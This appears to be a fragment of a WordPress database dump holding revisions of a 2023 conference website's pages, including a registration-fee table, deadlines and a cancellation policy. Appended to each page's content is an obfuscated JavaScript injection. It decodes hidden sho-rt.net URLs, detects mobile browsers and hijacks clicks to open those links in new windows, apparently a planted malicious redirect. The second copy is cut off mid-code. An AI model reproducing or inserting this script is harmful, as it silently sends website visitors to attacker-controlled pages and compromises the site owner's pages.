2023</li>\n</ul>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-04-19 11:09:30','2023-04-19 11:09:30','',2654,'https://gsw2023.com/?p=4068',0,'revision','',0),
(4069,1,'2023-04-19 11:12:11','2023-04-19 11:12:11','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">REGISTER NOW</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span>[/bsf-info-box][vc_separator style=\"shadow\" border_width=\"8\"][vc_column_text]<strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>\n<p style=\"font-weight: 400;\">Early bird registration deadline: <del>June 1, 2023</del>, June 15, 2023</p>\n</li>\n<li>\n<p style=\"font-weight: 400;\">Late registration deadline: July 15, 2023</p>\n</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than August 2, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Sep. 3<sup>rd</sup> and Sep. 5<sup>th</sup></strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 